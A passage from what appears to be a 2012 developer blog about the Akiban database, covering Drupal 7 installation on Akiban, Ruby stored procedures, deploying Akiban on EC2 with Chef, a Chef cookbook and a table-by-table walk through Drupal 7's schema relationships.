The above will automatically start the Akiban server process and half of your available memory will be allocated for the JVM heap by default. If interested in modifying any configuration options, please see our documention on how to do this.

Next, we’ll download Drupal 7 and install Apache along with the needed PHP database drivers for Akiban.

wget http://ftp.drupal.org/files/projects/drupal-7.17.tar.gz
tar zxvf drupal-7.17.tar.gz
sudo apt-get install -y apache2 php5-pgsql php5-gd libapache2-mod-php5 php-apc
sudo mkdir /var/www/drupal
sudo mv drupal-7.17/* drupal-7.17/.htaccess /var/www/drupal
sudo cp /var/www/drupal/sites/default/default.settings.php /var/www/drupal/sites/default/settings.php
sudo chown www-data:www-data /var/www/drupal/sites/default/settings.php
sudo mkdir /var/www/drupal/sites/default/files
sudo chown www-data:www-data /var/www/drupal/sites/default/files/
sudo service apache2 restart

The final piece of software we need is the Akiban database module for Drupal. Right now, this module is a sandbox project on drupal.org so the only way to download it is to check it out with git:

sudo apt-get install -y git
git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban
cd akiban
git checkout 7.x
cd ../
sudo cp -R akiban /var/www/drupal/includes/database/.
sudo chown -R www-data:www-data /var/www/drupal/includes/database/akiban

Notice we had to switch to the 7.x branch. The master branch in this repository is for running the module with Drupal 8.

The last thing which needs to be done is apply a tiny patch to Drupal core. This patch only avoids the creation of 2 indexes in the menu module. These index defitions are not compatible with Akiban with our current release. Its likely this will be resolved in a future Akiban release and so the need for this patch will be removed:

sudo cp akiban/core.patch /var/www/drupal
cd /var/www/drupal
sudo patch -p1 < core.patch
cd

Drupal 7 can now be installed as you normally would. Just make sure to select Akiban as the database during installation!

After installation completes successfully we want to group the tables and gather statistics for out cost-based optimizer. 2 SQL scripts are provided to achieve this. They can be run using psql as so:

psql -h localhost -p 15432 drupal -f akiban/grouping.sql
psql -h localhost -p 15432 drupal -f akiban/gather_stats.sql

The commands above assume drupal is the name of schema in which Drupal was installed. That should obviously be changed to the name of the schema you specified during installation.

Thats it! You now have a bare Drupal 7 site running on the Akiban database! I have some plans for more posts in the coming weeks. In particular, some things I plan on covering are how to migrate a Drupal site running on MySQL to Akiban and how to use Akiban as a query accelerator for a Drupal site similar to the use case in the post Dries wrote. I’ll also show what is possible with the REST access that we enable straight to our database (hint: its on port 8091).

Stored Procedures in Akiban

2012-11-16T00:00:00-08:00

This week, we released version 1.4.3 of Akiban. This release has a bunch of great new features and bug fixes in it. There is one new feature in this release in particular that I wanted write about today. Akiban now has a preview implementation of stored procedures!

Now that may not sound too exciting in itself so please bear with me. What gets me excited about this feature is that in Akiban, we allow creation of stored procedures in a multitude of languages. Stored procedures can be implemented using:

Java
Javascript
Ruby
Python
Groovy
Clojure

That’s a pretty nice selection! I’m going to show some examples in Ruby here and if people are interested in more examples, please let me know in the comments and I’ll be sure to whip up other examples in different languages.

First things first and we need to make sure Akiban is configured to allow the creation of stored procedures in Ruby. We have a pretty simple property that controls the class path for our stored procedure scripting languages - akserver.routines.class_path. I just need to make sure that property has an absolute path to where my JRuby jar is installed on my system. Once that property is set in my server.properties file, I can restart Akiban and I’m ready to go.

Lets start with a simple example. I just want to call a function that prints out my name.

CREATE PROCEDURE my_name(out name VARCHAR(128))
  LANGUAGE ruby PARAMETER STYLE variables AS $$
    name = 'padraig'
$$;

Now let’s call that stored procedure from the command line:

test=> call my_name();
  name   
---------
 padraig
(1 row)

test=>

Success! Our hello world example is up and running.

We don’t just have to return simple data types like that. We can also return ruby hashes. For example, here is a stored procedure that returns a ruby hash:

CREATE PROCEDURE ruby_hash(IN x BIGINT, IN y DOUBLE, OUT s DOUBLE, OUT p
DOUBLE)
  LANGUAGE ruby PARAMETER STYLE variables AS $$
{ "p" => $x * $y,
  "s" => $x + $y }
$$;

Notice this example also demonstrates how to pass parameters to a stored procedure. Running the above stored procedure, we get:

test=> call ruby_hash(10, 100);
   s   |   p    
-------+--------
 110.0 | 1000.0
(1 row)

test=>

A common example used when demonstrating a programming language is to implement a function to compute Fibonaaci numbers. Hence, here is a stored procedure to do just that:

CREATE PROCEDURE fib_r(IN x DOUBLE, OUT s DOUBLE)
  LANGUAGE ruby PARAMETER STYLE java EXTERNAL NAME 'do_fib' AS $$
    def do_fib(x, s)
      s[0] = fib(x)
    end
    def fib(n)
      n < 2 ? n : fib(n - 1) + fib(n - 2)
    end
$$;

In the code above, note that PARAMETER STYLE java means that the function named with EXTERNAL NAME takes as many positional arguments as there are parameters. And an example of running it:

test=> call fib_r(10);
  s   
------
 55.0
(1 row)

test=>

A common technique used to speed up this implementation is to use memoization. A stored procedure that uses this technique follows:

CREATE PROCEDURE fib_non_r(IN x DOUBLE, OUT s DOUBLE)
  LANGUAGE ruby PARAMETER STYLE java EXTERNAL NAME 'do_fib' AS $$
    def do_fib(x, s)
      s[0] = fib(x)
    end
    $fibonacci = Hash.new{ |h,k| h[k] = k < 2 ? k : h[k-1] + h[k-2] }
    def fib(n)
      $fibonacci[n]
    end
$$;

Lets turn on some timing and compare the recursive version versus the version that uses memoization.

test=> call fib_r(30);
    s     
----------
 832040.0
(1 row)

Time: 469.492 ms
test=>

test=> call fib_non_r(30);
    s     
----------
 832040.0
(1 row)

Time: 4.649 ms
test=>

As expected, the version that uses memoization is much better. Next I’m going to write a stored procedure that returns some data from a query. Let’s say I create a simple table and insert some data into it like so:

test=> create table t1(id int);
CREATE TABLE
test=> insert into t1 values (1), (2), (3), (4), (5), (6);
INSERT 0 6
test=>

This stored procedure will return all the data from that table and order it by ID. A simple procedure to do that is:

CREATE PROCEDURE get_data()
  LANGUAGE ruby PARAMETER STYLE variables AS $$
    conn =
java.sql.DriverManager.get_connection("jdbc:default:connection")
    conn.create_statement.execute_query("SELECT id FROM t1 ORDER BY id
DESC")
$$;

And let’s call the stored procedure and see what kind of results we get:

test=> call get_data();
 id 
----
  6
  5
  4
  3
  2
  1
(6 rows)

test=>

As a last example, I want to extend this example and have an input parameter that filters the query results to only return ID values that are greater than whatever the input value is.

CREATE PROCEDURE get_data(IN filter BIGINT)
  LANGUAGE ruby PARAMETER STYLE variables AS $$
    conn =
java.sql.DriverManager.get_connection("jdbc:default:connection")
    conn.create_statement.execute_query("SELECT id FROM t1 WHERE id >
#{$filter} ORDER BY id DESC")
$$;

Running the above procedure with a valid input value yields:

test=> call get_data(2);
 id 
----
  6
  5
  4
  3
(4 rows)

test=>

The above were some simple examples of writing stored procedures in Ruby with Akiban. I’ll likely write another post with some more advanced examples when I get a chance. If this interested you, definitely download the 1.4.3 release and play around with it to try this out for yourself. If anybody has any questions or would like more examples and information, please ask in the comments or on our public mailing list and I’ll be happy to answer.

Why Build a New SQL Database?

2012-11-12T00:00:00-08:00

When I’m at conferences or meetups and people discover I work for a company building a new database, there are usually a few puzzled looks. Explaining the technology behind Akiban to people is easy but the usual reason for the puzzlement is that many people wonder why on earth a company would want to develop a new database from scratch when so many alternatives already exist.

There are good reasons, but I’ve struggled with articulating them especially when someone wants a 90 second explanation at a conference. In the interest of having an answer that I can easily refer people to, here’s what I think we’re trying to do. These are the problems that Akiban is aiming to solve.

Problems Akiban Solves

1) The object-relational impedance mismatch

Frequently referred to as the “vietnam of computer science” by some people, this problem is defined by Wikipedia as:

“a set of conceptual and technical difficulties that are often encountered when a relational database is being used by a program written in an OOO programming language or style”

Typically, each class in an application is mapped to a table in the backend database with the fields of that class being columns of the table and each instance of that class is a row in the corresponding table. In Akiban, application objects map to what we call table groups. Table groups are fundamentally a way of storing data - we store data as interleaved rows in a B+ Tree. Or more simply put, Akiban stores data hierarchically.

This makes integration of Akiban with existing ORM’s an interesting proposition since we expose methods of retrieving table groups directly through SQL. For example, Mike Bayer recently implemented support for Akiban in the SQLAlchemy ORM for Python. We are also working on support for Doctrine in the PHP world and ActiveRecord in the Ruby world.

Dr. Eric Brewer also touched on this in his closing talk at RICON 2012 (which seems to have been an excellent conference based on the posted videos). One quote from Dr. Brewer that really stuck out in my mind was - “instead of clean database where tables are joined at last minute. I actually want to have pre-joined them. I don’t really want to do more than 1 query”. That ties in nicely with what we allow by exposing methods to retrieve table groups or part of a table group with nested SQL i.e. in 1 query, an entire table group or part of a table group can be retrieved.

2) SQL (performance) doesn’t have to suck

SQL gets a bad rap. I’m not 100% sure if that’s because people don’t like the language or if it’s that people think that the performance of SQL queries are terrible due to poor experiences. Perhaps its a little bit of both. What’s great about SQL is that so-called ‘neck-tie’ programmers can easily use this declarative language to interact with a database system. To quote again from Dr. Brewer’s RICON talk - “having a language for them is a good idea. nosql does not really talk to these people”.

SQL can be used to solve many problem types. I once heard someone quip, “there’s a SQL query for that”, meaning it’s likely there are not many problems out there SQL cannot solve.

SQL performance in Akiban is greatly improved due to table grouping and the fact that our entire system (in particular our query optimizer and execution engine) is built from the ground up with this storage architecture in mind. First off, queries that join tables within a single table group can execute without the need for a join operation. This is due to how we store related data in table groups hierarchically. Second, group_indexes can be created on top of a table group. This means that indexes can be created on columns from more than 1 table. Third, our optimizer can choose a number of different query execution plans that use multiple indexes such as index intersection and index merging thereby reducing the amount of data that needs to be processed during various stages of query execution.

3) Do We Always Need ETL?

Why is ETL brought up as a solution when someone talks about running complex reports? Obviously in some environments, an ETL process is absolutely needed. But wouldn’t we ideally like to perform queries typically performed in data warehouse environments in real-time without the requirement for a separate process to be performed? This process is typically needed because operational systems cannot handle the load that would be generated if complex reports were run against them . Running these types of queries against an operational system would likely cripple it (this is obviously a simplification of a complex process). We’ve had many customers come to us running reports against their operational database and they don’t feel like they should need to construct a data warehouse for the relatively simple reports they wish to run on their data. We tend to agree in some cases.

Depending on who I am talking to, I either get someone really excited when I talk about this (marketing/sales people get all excited due to buzz words like ETL and real time) or am met with a groan and slight roll of the eyes (technical person who thinks I am full of shit). I can see why it comes across sounding like something a sales person would say without actually knowing what they are talking about. I do feel our message here needs to be worked on but with the release of projects like Impala from Cloudera and Spire from Drawn to Scale, I feel its clear there is huge interest for a solution in this area. Akiban can help people fighting these types of problems.

4) Augmenting Existing Deployments

Our long-term goal is to become the main database for a customer and the database of choice when a developer starts a new project, but we understand its difficult for someone who has developed an entire application with an existing database like MySQL or PostgreSQL. What we have developed to deal with this reality is so called adapters for existing systems. Our first publically available adapter is for MySQL and this allows a user to spin up a regular MySQL slave and convert whatever tables they are interested in being part of a table group to Akiban.

What Akiban is Not Good For (right now)

Now if you’ve read this far, you might be expecting me to list another problem that we solve as world hunger or something like that. We of course have some uses cases where we are not suitable and some drawbacks. So let’s balance the 4 problems I feel Akiban solves with 4 reasons why you might be reluctant to use Akiban at this present time.

1) Scale out is coming, but not here yet.

Today Akiban is focused on single node performance but with an eye to developing scale out functionality in the near future. Our scale out capability is under development but it is not expected to be production ready until next year.

This assumes you want to deploy Akiban as your main database. If you are deploying Akiban as a MySQL replica in an existing MySQL environment, there is no reason multiple MySQL slaves with Akiban cannot be spun up.

2) Simple Queries or No Problems

If your application really only issues simple queries and does not use an ORM, then Akiban is not really a fit. I would be surprised if someone with such a workload would be experiencing problems.

If your existing solution is working just fine for you, why change? You would be surprised at the number of customers we talk to who really have no need for our solution since they have no problems or are unlikely to have any need for Akiban in the near future. We are of course happy to work with these customers but we tell them straight up that they probably don’t need Akiban.

3) Maturity

Obviously many of the existing relational databases on the market today have a head start on us here (PostgreSQL by almost 30 years). If you are looking for a database solution that has been around for a long time and deployed countless times, Akiban may not be what you are looking for. I will add though that we have a few customers where we have been deployed for almost a year (public customer testimonials coming in the next few weeks all going well).

However, I will say that this is another reason why we are working on adapters for other database systems. If you are not comfortable trying out a new database like Akiban, spinning it up as a slave in your staging/development environment for testing purposes is a pretty low risk and will not affect any existing infrastructure.

4) Existing knowledge

This leads on from point (4) above. If you have built a large infrastructure on another database, its likely your staff is highly skilled in that database platform. While Akiban is quite easy to use and administer, as with other database systems, some knowledge of Akiban needs to be gained in order to use the system in the best manner possible. Also since Akiban is a new solution, not as much troubleshooting information is available publicly. For example, when encountering an issue in MySQL, a simple Google search is likely to result in being led to a page where someone else has documented a resolution for the issue.

Conclusion

This post was an honest attempt at stating what I personally think Akiban is a great solution for and what we are currently not a good fit for. My personal opinion (obviously biased since I work for Akiban) is that the problems we are solving far outweigh the drawbacks of our solution. We will have a scale out strategy in less than a year which is obviously important and you can be sure I will be blogging about that as we develop it. I’d also like to mention that points (3) and (4) that are dis-advantages of Akiban apply to any database solution that is relatively new and so is not unique to Akiban.

Input on what we are doing at Akiban is very important to us. If you have any comments that you would like to add, please leave them here or ask on our public mailing list. Also, if you are curious to try the product out, it can be downloaded for free here.

Deploying Akiban on EC2 with Chef

2012-09-26T00:00:00-07:00

This post is a tutorial on how to deploy Akiban on an EC2 instance using chef and the Opscode Chef platform.

The Opscode Platform

In this article, we’ll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to sign up for a new account. Once you are signed up, the next step is to create a new organization. For this article, I’m going to create an organization named akiban. Once your organization is created, you should see the organization in your list of organizations when you click on the Organizations link at the top right of the opscode console. My view looks like:

Configure AWS

An assumption made in this article is that you have an aws_link account. If you don’t, signing up is relatively straightforward.

Amazon blocks all incoming traffic to EC2 instances by default and SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and I don’t want to use the default security group so for this article I created a new security group named akiban with the appropriate rules (only SSH for now). After creating the new security group and adding the SSH rule, the group details for akiban look like:

I also created a new key pair specifically for this article. I gave this key pair the name akiban. After creating this key pair, I downloaded the private key to my SSH folder and updated the permissions on the key:

mv ~/Downloads/akiban.pem ~/.ssh/
chmod go-r ~/.ssh/akiban.pem

Configure chef

This article assumes both chef and git are already installed on your workstation. In my case, I ran all these commands on OSX laptop. Instructions for installing chef can be found on Opscode’s wiki.

The first thing to do is create a chef repository on your workstation with git and get a clean history:

git clone git://github.com/opscode/chef-repo.git ~/akiban-chef-repo
cd ~/akiban-chef-repo
rm -rf .git
git init .
git add *
git commit -a -m "Initial commit."

The chef repository is a version controlled directory that contains cookbooks and other components relevant to chef.

Next, create a .chef directory withing this repository. This directory contains all the configuration files for just this chef repository:

mkdir -p ~/akiban-chef-repo/.chef

Next, we need to download keys and knife configuration files from the Opscode platform that will be used for interacting with the Opscode platform. Keys are needed for both your user and organization on the Opscode platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and click View profile on the right of that page. Finally, click the get private key link on your account page as seen below:

After downloading this new key, I placed it in the configuration directory for the chef repository I am using for this article:

mv ~/Downloads/posulliv.pen ~/akiban-chef-repo/.chef

For your organization, click on the Regenerate validation key link and Generate knife config link from the organizations home page. After clicking those 2 links, you will have 2 files (dependent on your organization name obviously): 1) akiban-validator.pem and 2) knife.rb. These 2 files must be moved into the configuration directory for the chef repository being used for this article:

mv ~/Downloads/akiban-validator.pem ~/akiban-chef-repo/.chef
mv ~/Downloads/kinfe.rb ~/akiban-chef-repo/chef

Now, whenever we are in the akiban-chef-repo directory, the knife utility will connect to the Opscode platform. To verify this, lets list out the current clients our hosted chef server knows about:

killarney:akiban-chef-repo posullivan$ knife client list
  akiban-validator
killarney:akiban-chef-repo posullivan$

Next, knife needs to be configured with the correct AWS credentials. This is done by adding the following 2 lines to the knife.rb file in the ~/akiban-chef-repo/.chef directory:

knife[:aws_access_key_id]     = "Your AWS Access Key"
knife[:aws_secret_access_key] = "Your AWS Secret Access Key"

After adding these credentials the EC2 instances associated with the AWS account can be viewed:

killarney:akiban-chef-repo posullivan$ knife ec2 server list
Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  
i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running
i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped
i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running
killarney:akiban-chef-repo posullivan$

Akiban Cookbook

chef is now configured to work with the appropriate AWS account. Now we want to bootstrap an EC2 instance with the latest early developer release of Akiban. I covered that we developed a cookbook for Akiban in my previous post and we place that in our chef repository as so:

knife cookbook site install akibanserver

This downloads the latest release of the akibanserver cookbook from the opscode community site. Next, we want to upload this cookbook to our hosted chef server:

cd ~/akiban-chef-repo
knife cookbook upload akibanserver --include-dependencies

We can verify this cookbook (and its dependencies) are now available:

killarney:akiban-chef-repo posullivan$ knife cookbook list
  akibanserver   0.1.0
  apt            1.4.8
  openssl        1.0.0
  postgresql     1.0.0
killarney:akiban-chef-repo posullivan$

Create and Verify EC2 Instance

We are now ready to create an EC2 instance and have it bootstrap itself and install the Akiban developer edition! Feel free to pick any CentOS or Ubuntu AMI you wish for the command below:

knife ec2 server create \
--run-list akibanserver \
--image ami-2d4aa444 \
--flavor m1.small \
--groups akiban \
--ssh-key akiban \
--identity-file ~/.ssh/akiban.pem \
--ssh-user ubuntu \
--node-name akibantest \
--availability-zone us-east-1a

After kicking the above, you will see lots of output! Assuming the command finishes successfully, to verify the server is created, first we check that it appears in the server list output from EC2:

killarney:akiban-chef-repo posullivan$ knife ec2 server list
Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  
i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running
i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped
i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running
i-fd17d380   184.72.187.226  10.34.106.161   m1.small    ami-2d4aa444  akiban         akiban           running
killarney:akiban-chef-repo posullivan$

The chef server should also list this instance as a node now:

killarney:akiban-chef-repo posullivan$ knife node list
akibantest
killarney:akiban-chef-repo posullivan$

The instance is now available and we can log on and start using the akiban server:

killarney:akiban-chef-repo posullivan$ ssh -i ~/.ssh/akiban.pem ubuntu@184.72.187.226
Linux ip-10-34-106-161 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Sep 26 20:28:34 UTC 2012

  System load: 0.54             Memory usage: 16%   Processes:       54
  Usage of /:  9.3% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

New release 'precise' available.
Run 'do-release-upgrade' to upgrade to it.

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20120913'.
*** System restart required ***
Last login: Wed Sep 26 20:23:13 2012 from 75-147-9-1-newengland.hfc.comcastbusiness.net
ubuntu@ip-10-212-87-144:~$ psql -h localhost -p 15432 information_schema
psql (8.4.13, server 8.4.7)
Type "help" for help.

information_schema=> select * from server_instance_summary;
  server_name  | server_version | instance_status |     start_time      
---------------+----------------+-----------------+---------------------
 Akiban Server | 1.4.1.2151     | RUNNING         | 2012-09-26 20:30:04
(1 row)

information_schema=>

Conclusion

Following the steps in this article, it should be pretty easy to spin up an EC2 instance with Akiban installed on it with chef. We are currently starting work on a cookbook for the Akiban Adapter for MySQL. When that is available, a post detailing how to use that will be posted.

Akiban Server Cookbook for Chef

2012-08-22T00:00:00-07:00

Last week I spent some time putting together a cookbook for Akiban that allows the Akiban Server to be easily deployed in environments where chef is used. This cookbook is currently available on github.

This cookbook uses the awesome new tool opscode announced last week - Test Kitchen. This makes testing of our cookbook extremely easy for us. Right now, the tests for the Akiban Server cookbook are very similar to the tests developed for the MySQL cookbook. On a system with kitchen installed, the cookbook can be downloaded and tests run easily by simply running:

kitchen test

Running the above results in a virtual machine being downloaded and started using vagrant. The virtual machine is then provisioned using chef and the cookbook under test is set up. The Akiban Server cookbook installs the PostgreSQL client (since the Akiban Server speaks the PostgreSQL protocol) and the Akiban Server. The tests run to verify everything is working ok are pretty simple at the moment: some data is loaded in to a single table and a few simple queries are run to make sure the database server is functioning correctly.

One other item we implemented that was pretty neat was we use the Travis build system to make sure our cookbook adheres to best practices by running foodcritic on every new push to master.

Test Kitchen and foodcritic together help us to ensure our cookbooks are high quality. Our main goal is to make sure our customers enjoy the easiest deployment process and since we see many people using chef, we wanted to make sure we integrate well with environments where chef is in place.

I plan on doing a webinar in the near future on deploying Akiban Server with chef. In that webinar, I will be able to do some demos of deploying Akiban in EC2 with chef.

Digging into Drupal's Schema

2012-08-02T00:00:00-07:00

I’m relatively new to Drupal internals and most of the work I do is on the database side. While searching for information on Drupal’s schema, I found very little. During my research, I put together an ER diagram of the schema installed by Drupal 7 (D8 is very similar with only 3 extra tables at time of writing) and decided to share my work. Note that the relationships I discuss here are based on the foreign key documentation that exists in core and my understanding of what I believe other relationships could be. Corrections and comments are very much welcome.

Overview

I’ll start off by showing my complete ER diagram below. You will see I grouped tables I found to be related in colored boxes. The image below is just meant to give a general overview of the schema. I will be diving into different parts of the schema in this post. I created this diagram using MySQL Workbench and the model can be downloaded from here if someone wishes to open this up in Workbench. This gist also shows the ALTER TABLE SQL statements that would need to be issued to actually create these foreign keys in MySQL. I would not recommend doing this right now with Drupal as many things would break.

Without delving into the relationships and details of this diagram, lets first cover some basic details. A stock install of Drupal 7 results in 73 tables being created. 10 of those tables are used for caching purposes:

Caching Table	Description
cache	caches items not separated out into their own cache tables
cache_block	the block modules can cache already built blocks here
cache_bootstrap	data required during the bootstrap process can be cached in this table
cache_field	stores cached field values
cache_filter	caches already filtered pieces of text
cache_form	caches recently built forms and their storage data
cache_image	caches information about image manipulations that are in progress
cache_menu	caches router information as well as generated link trees
cache_page	caches compressed pages served to anonymous users
cache_path	caches path aliases

11 tables are created which do not relate to any other tables:

Table Name	Description
actions	stores action information
batch	stores details about batches (processes that run in multiple HTTP requests)
blocked_ips	stores a list of blocked IP addresses
flood	controls the threshold of events, such as the number of contact attempts
queue	stores items in queues
rdf_mapping	stores custom RDF mappings for user-defined content types
semaphore	stores semaphores, locks, and flags
sequences	stores IDs
system	contains a list of all modules, themes, and theme engines that are or have been installed
url_alias	contains a list of URL aliases for Drupal paths
variable	stores variable/value pairs created by Drupal core or any other module or theme

The 21 tables listed above are self-explanatory and I’m not going to discuss them any further in this post. They also are independent in that these tables have no relationships with other tables.

Field Related Tables

There are 8 tables installed with core related to fields and field storage:

Table Name	Description
field_data_body	stores details about the body field of an entity
field_revision_body	stores information about revisions to body fields
field_data_comment_body	stores information about comments associated with an entity
field_revision_comment_body	stores information about revisions to comments
field_data_field_image	stores information about images associated with an entity
field_revision_field_image	stores information about revisions to images
field_data_field_tags	stores information about tags associated with an entity
field_revision_field_tags	stores information about revisions to taxonomy terms/tags associated with an entity

While I was initially tempted to have these tables related to node, that would not really be correct since these tables are related to an entity. In D7, entities can be other objects besides nodes, such as users or comments. The entity_type column in these tables reflects that reality. These tables can be stored in other storage systems such as MongoDB due to the field storage API introduced in Drupal 7.

There are 2 other tables related to fields: field_config and field_config_instance. These tables store field configuration information. I believe a row in field_config_instance cannot (well at least should not) exist without the correspondong field_id in the field_config table. Hence, the one-to-many relationship from field_config to field_config_instance is an identifying relationship.

Small Groups of Tables

There are a number of groups you will notice in the full ER diagram that are made up of 2 to 3 tables. Zooming in on 4 of those groups, we can see those tables more clearly:

One thing you will notice is that some relationships are shown with a solid line whereas others use a dotted line. MySQL Workbench represents identifying relationships with a solid line and non-identifying relationships with a dotted line. If you are unfamiliar with those terms, the standard defintions are:

identifying relationship - the foreign key attribute is part of the child’s primary key attribute.
non-identifying relationship - the primary key attributes of the parent must not become primary key attributes of the child.

This stack overflow answer from Bill Karwin contains a good discussion on these topics.

Now lets discuss those groups in more detail.

Registry Group

I grouped the registry and registry_file tables together. These tables are used for implementing the code registry in Drupal. A one-to-many relationship exists from registry_file to registry and this relationship is an identifying relationship. A filename should not appear in the registry table that is not present in the registry_file table.

Image Group

I grouped the image_styles and image_effects tables together. These tables store configuration options for image styles and effects. A one-to-many relationship exists from image_styles to image_effects and this relationship is a non-identifying relationship.

date_format Group

There are three tables about date formats in Drupal. date_format_type is a lookup table that stores configured date format types. After a stock install of Drupal 7, three date format types exist:

long
medium
short

A one-to-many relationship exists from this lookup table to both date_formats and date_format_locale.

In practice, this would be problematic. For example, a new date format can be created by an adminstrator. In D7, this results in the system_date_format_save function being called. This function will insert a row in the date_formats table that will not have a corresponding type (type will be listed as custom).

You will also notice the locked column is redundant in the date_formats table. I submitted a patch to change this.

File Group

I grouped the file_managed and file_usage tables into 1 group. These tables store information about uploaded files and information for tracking where a file is used.

I believe a 1-to-1 relationship exists from file_managed to file_usage and that this is an identifying relationship.

User Related Tables

There are quite a few tables that store user related information. Below is a figure where I zoom in on those tables.

As you can see, the tables directly associated with users are watchdog, sessions, and authmap. These tables are in a one-to-many relationship from users. The functionality these tables provide is:

Table Name	Description
authmap	stores distributed authentication mapping
sessions	stores information about a users session
watchdog	contains logs of all system events

There are then two tables that are in a many-to-many relationship with users that link this table with other groups. One of these is the users_roles table. This table links users with role. The role table is then in a one-to-many relationship with the role_permission table. The other many-to-many table is shortcut_set_users. This table links users with shortcut_set.

The tables for the menu system are not really related to users but I placed the group close by since the menu_links table maintains a one-to-many relationship with the shortcut_set table. While the tables for the menu system do not appear to be related, I do believe a relationship exists there. In particular, I think that the menu_link table has relationships to both the menu_router and menu_custom tables. The router_path column in menu_links could reference the router column in menu_router and the menu_name column in menu_links could reference the menu_name in the menu_custom table. Right now however, after a stock install of D7, a row with a menu name that is not present in menu_custom will be created in menu_links.

The menu system tables and a description of what they do is below.

Table Name	Description
menu_custom	holds definitions for top-level custom menus
menu_links	contains the individual links within a menu
menu_router	maps paths to various callbacks

Node Related Tables

Node is one of the most central concepts in Drupal so as you can imagine, many tables are related to that concept. First off, a high level overview of the tables related to the node table are shown below.

Tables that are directly related to node are node_revision, node_access, and node_type. The node_type table is in many-to-many relationship with node and block_node_type. node_revision is in a many-to-one relationship with node as is node_access. The node_access table has only 1 row upon initial installation and references a non-existent node. An issue has been created to address this.

The tables directly related to node and a description of what they do is below.

Table Name	Description
node_access	identifies which realm/grant pairs a user must possess in order to view, update, or delete specific nodes
node_revision	stores information about each saved version of a node
node_type	stores information about all defined node types

Taxonomy Tables

Four tables in the stock schema are related to taxonomy. These tables are shown in the figure below.

First of all, the taxonomy_index table is in a many-to-many relationship with the node and taxonomy_term_data tables. The taxonomy_vocabulary table has a one-to-many relationship with the taxonomy_term_data table. The taxonomy_term_data table in turn has 2 1-to-many relationships with the taxonomy_term_hierarchy table.

A description of the taxonomy tables is given below.

Table Name	Description
taxonomy_index	maintains de-normalized information about node/term relationships
taxonomy_term_data	stores term information
taxonomy_term_hierarchy	stores the hierarchical relationship between terms
taxonomy_vocabulary	stores vocabulary information

Block Tables

The main table in this group is block. It has three directly related tables in one-to-many relationships: block_node_type, block_role, and block_custom.

A description of the blocks tables is given below.

Table Name	Description
blocks	stores block settings
block_custom	stores the contents of custom-made blocks
block_node_type	stores information that sets up display criteria for blocks based on content type
block_role	stores access permissions for blocks based on user roles

Search Tables

The relationships for the search tables I am a little unsure of. I believe they are as shown in the figure below.

The relationship I’m most unsure of here are between search_total and search_index. I don’t think the one-to-many relationship I have in place from search_total to search_index is correct.

A description of the search tables is given below.

Table Name	Description
search_dataset	stores items that will be searched
search_index	stores the search index and associates words, items, and scores
search_node_links	stores items that link to other nodes
search_total	stores search totals for words

Tables That Relate Nodes to Users

There are three tables in many-to-many relationships between node and users:

Table Name	Description
comment	stores comments and associated data
history	stores a record of which users have read which nodes
node_comment_statistics	maintains statistics of nodes and comments posts to show new and updated flags

The comment table could be in its own group. I decided against doing that in this ER diagram since I felt like it would have been a table by itself. Logically, I think of it as either being in the users or node group.

node_comment_statistics does also maintain a relationship with comment. This is a non-identifying relationship since a node can exist without any comments.

Conclusion

During this work, I noticed that the column definitions for many foreign key relationships are in-correct which would result in MySQL not allowing these constraints to actually be created. I created an issue and patch for this but it turns out Liam Morland is working on using foreign keys in core and also came across this around the same time as me.

Other issues I encountered have also been logged by Liam:

the node_access table references a non-existent node (relevant issue)
a set name exists in shortcut_set that does not exist in menu_links (relevant issue)

I would vote for foreign keys being used in Drupal core for a number of reasons, not least of which foreign keys aid a newcomer when trying to understand the schema installed by Drupal.

As I mentioned at the beginning of this post, any comments or corrections are very much welcome. I hope this information can prove useful to someone else besides me!

PostgreSQL Protocol in Akiban Server

2012-07-23T00:00:00-07:00

Last week I was at OSCON with Akiban where I did a demo during Ori’s talk. We announced our early developer release at OSCON and it was a lot of fun to be able to show people our product at our booth. It was also satisfying to see users download and try out the product we’ve been working on. I’m hoping our source code will also be made publically available in the near future.

One of the common questions we got during the conference was why we implemented the PostgreSQL protocol. Some people were also confused thinking that we were a fork of PostgreSQL due to this. Akiban Server is a completely independent database server we’ve built from the ground up and when it came time to decide on a communication protocol, we decided that the PostgreSQL protocol was the best choice.

The main reasons we chose the PostgreSQL protocol are:

the protocol is pretty simple and well documented
many clients exist for PostgreSQL and can be re-used with Akiban (this means we do not have to spend a lot of time on client drivers)
the PostgreSQL command line tool and client library ships with OSX by default now (making playing with our server much easier)
it supports asynchronous operations

We (really when I say we, I mean Mike) also implemented support for a number of PostgreSQL system tables in order to support many of the \d commands in psql by creating views internally.

If you are interested in trying it out, I encourage you to download our server and start playing with it. Try using your favorite PostgreSQL tools with it and see if they break. We are very interested in any and all feedback!

Configuring Drupal 7.x With PostgreSQL Replication

2012-07-08T00:00:00-07:00

One of the new features in Drupal 7 is that it supports sending queries to a read-only slave database. Since version 9.0, PostgreSQL supports replication natively. In this post, I wanted to cover how to configure replication in PostgreSQL and have Drupal make use of a slave. I will use the master/slave terminology that is common in the MySQL world when referring to the master (primary) and slave (standby) servers in this post.

